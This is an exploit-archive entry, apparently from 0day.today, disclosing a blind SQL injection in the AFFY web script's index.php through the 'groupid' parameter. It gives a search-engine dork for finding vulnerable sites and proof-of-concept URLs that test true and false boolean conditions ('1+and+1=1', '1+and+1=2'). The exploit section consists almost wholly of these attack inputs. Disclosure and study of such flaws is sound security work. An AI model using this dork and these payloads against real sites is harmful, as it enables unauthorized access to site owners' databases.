id: 18338
date: 05/23/2012
title: AFFY (index.php) Blind Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

AFFY (index.php) Blind Sql Injection Vulnerability
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.affy.no/
.:. Drok           : inurl:"index.php?groupid" "powered by AFFY"      

####################################################################

===[ Exploit ]===


http://SITE/index.php?groupid=1[BLIND]

http://SITE/index.php?groupid=1+and+1=1        True
http://SITE/index.php?groupid=1+and+1=2        False

####################################################################



#  0day.today [2023-03-24]  #